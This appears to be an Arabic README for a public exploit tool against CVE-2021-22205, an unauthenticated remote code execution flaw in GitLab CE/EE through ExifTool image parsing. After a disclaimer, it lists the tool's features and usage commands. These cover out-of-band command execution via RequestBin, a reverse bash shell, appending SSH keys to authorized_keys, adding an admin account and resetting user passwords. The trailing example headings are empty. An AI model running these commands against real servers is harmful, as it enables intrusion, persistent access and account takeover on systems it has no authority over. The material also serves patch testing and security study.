
RCE قبل المصادقة في GitLab CE/EE باستخدام ExifTool
GitLab CE/EE RCE قبل التوثيق باستخدام ExifTool
هذا المشروع مخصص للتعلم فقط، إذا تم انتهاك حقوق شخص ما، يرجى الاتصال بي لإزالة المشروع، والأهم لا تستخدمه بشكل غير قانوني. إذا قمت بأي سلوك غير قانوني أثناء استخدام هذه الأداة، فستتحمل جميع العواقب بنفسك. جميع المطورين وجميع المساهمين في هذه الأداة لا يتحملون أي مسؤولية قانونية أو تضامنية.
تم اكتشاف مشكلة في GitLab CE/EE تؤثر على جميع الإصدارات بدءًا من 11.9. لم يكن GitLab يتحقق بشكل صحيح من ملفات الصور التي يتم تمريرها إلى محلل ملفات مما أدى إلى تنفيذ أوامر عن بعد.
الإصدارات المتأثرة:
اكتشاف إصدار Gitlab من خلال التجزئة في Webpack manifest.json
تفاعلات خارج النطاق تلقائية مع DNSLog و PostBin RequestBin
دعم الـ Reverse Bash Shell / إضافة مفتاح SSH إلى authorized_keys
دعم تعديل واستعادة كلمة مرور مستخدم gitlab عن طريق ENTER
🐚 ››› python CVE-2021-22205.py
░░░░▐▐░░░ CVE-2021-22205
▐ ░░░░░▄██▄▄ GitLab CE/EE Unauthenticated RCE using ExifTool
▀▀██████▀░░ Affecting all versions starting from 11.9
░░▐▐░░▐▐░░ security.humanativaspa.it/gitlab-ce-cve-2021-22205-in-the-wild
▒▒▒▐▐▒▒▐▐▒ github.com/inspiringz/CVE-2021-22205
Usage:
python3 CVE-2021-22205.py -u site_url -m detect # gitlab version & vuln detect
python3 CVE-2021-22205.py -u site_url -m rce1 'id' # rce (echo via requestbin oob)
python3 CVE-2021-22205.py -u site_url -m rce2 'id' # rce (echo via write file) *
python3 CVE-2021-22205.py -u site_url -m rev ip port # reverse bash shell
python3 CVE-2021-22205.py -u site_url -m ssh git/root # append ssh authorized_keys
python3 CVE-2021-22205.py -u site_url -m add user pass # add manager account *
python3 CVE-2021-22205.py -u site_url -m mod user # modify specified user's password => P4ss@GitLab
python3 CVE-2021-22205.py -u site_url -m rec user # restore specified user's original password
site_url: http[s]://<domain|ip>[:port]/، مثل: https://example.com:9000/* غير مستقرة وقد لا تعمل :(الكشف:

RCE (صدى عبر RequestBin OOB):

Reverse Bash Shell:

إضافة مفتاح SSH إلى authorized_keys:

تعديل واستعادة كلمة مرور مستخدم Gitlab:
